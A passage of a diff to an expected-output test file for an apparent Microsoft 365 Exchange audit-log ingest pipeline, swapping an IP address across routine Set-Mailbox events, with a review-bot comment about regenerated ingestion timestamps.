bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853010200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -887,12 +887,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -935,7 +935,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -947,8 +947,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177590900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853013600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
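Review bot: The `event.ingested` line in this hunk changes from `2021-06-17T07:32:50.177590900Z` to `2021-12-09T13:42:30.853013600Z` only because the expected file was regenerated, not because of the IP substitution, and the same churn repeats in every `"event": {` hunk that follows (`@@ -1028,8`, `@@ -1109,8`, `@@ -1190,8`, `@@ -1271,8`, `@@ -1339,8`, `@@ -1408,8`, `@@ -1477,8`, `@@ -1545,8`, `@@ -1614,8`). Every future regeneration will rewrite these timestamps again, which buries the one meaningful change per hunk (`15.20.207.17` → `67.43.156.13`, applied consistently to `event.original`, `server.*`, `destination.ip` and `related.ip`). If the pipeline test config for this data stream supports marking fields as dynamic, declaring `event.ingested` there (e.g. `dynamic_fields:` with `event.ingested: ".*"`) would keep the timestamp out of the comparison; otherwise, restoring the previous `ingested` values before committing would leave only the intended IP diff for reviewers to verify.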
@@ -968,12 +968,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1016,7 +1016,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -1028,8 +1028,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177593700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853018300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1049,12 +1049,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1097,7 +1097,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -1109,8 +1109,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177598900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853023800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1130,12 +1130,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1178,7 +1178,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -1190,8 +1190,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177602300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853028900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -1211,12 +1211,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1259,7 +1259,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -1271,8 +1271,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177605200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
